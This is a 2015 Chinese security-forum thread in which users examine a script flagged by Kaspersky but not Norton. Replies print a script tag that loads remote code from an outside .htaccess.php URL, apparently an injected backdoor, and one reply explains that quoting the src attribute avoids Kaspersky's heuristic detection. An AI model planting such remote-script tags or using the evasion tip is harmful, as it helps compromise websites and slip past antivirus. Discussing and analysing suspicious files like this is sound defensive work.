诺顿IPS没拦截的脚本，安上卡巴之后报毒，帮我看看。。

显示全部楼层 · 发表于 2015-12-21 07:57:41

启发报的，不见得真的是毒，大伙看看其中的玄机？

密码123

显示全部楼层 · 发表于 2015-12-21 08:00:32

https://virusscan.jotti.org/zh-CN/filescanjob/6j8a8nnbx2
报的也不少。趋势科技都报毒了~

显示全部楼层 · 发表于 2015-12-21 09:08:31

文件没有什么问题。
但是<script src=http://basketballstrength.com/_borders/.htaccess.php ></script>所连接的域名我这里无法解析，不能判断。

打开效果

显示全部楼层 · 发表于 2015-12-21 10:24:24

@Wesly.Zhang
蚊子帮忙看下为什么会报毒好吗？

显示全部楼层 · 发表于 2015-12-21 11:50:52

本帖最后由 o0net315 于 2015-12-21 12:02 编辑

那个网址解析失败，具体是什么不清楚，不过有很多人利用.htaccess伪静态来做后门。
另外script src=引用的网址应该前后加引号
<script src="http://basketballstrength.com/_borders/.htaccess.php" ></script>
以上为标准写法，加引号后，卡巴斯基是不会报的。
只要src赋值里不加引号，并且存在.php，卡巴斯基就会报HEUR:Trojan.Script.Generic。
例如<script src=http://google.com/admin.php ></script>放在文本文件中，一样会报。
另外触发报毒也需要一定环境，如果把此代码放在head或者body中则不会触发报毒。
----------------
至于卡巴启发报的原因，请专业人士解释一下吧，我对hacker相关没有什么研究，虽做软件开发工作，但也不是做web相关工作的。

[可疑文件] 诺顿IPS没拦截的脚本，安上卡巴之后报毒，帮我看看。。

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

评分

评分

浏览过的版块